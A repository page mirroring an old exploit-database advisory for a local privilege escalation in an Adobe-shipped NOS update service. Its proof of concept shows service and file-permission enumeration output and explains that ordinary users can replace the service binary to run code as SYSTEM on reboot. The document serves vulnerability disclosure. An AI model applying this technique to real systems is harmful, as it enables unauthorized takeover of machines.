bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/9199.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

36 lines
No EOL
1.2 KiB
Text
Raw Blame History

Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
by Nine:Situations:Group
site: http://retrogod.altervista.org/
description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x
vendor: Nos Microsystems
poc:
C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: getPlus(R) Helper
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : getPlus(R) Helper
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
NT AUTHORITY\SYSTEM:F
The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.
# milw0rm.com [2009-07-20]
Reference in a new issue View git blame Copy permalink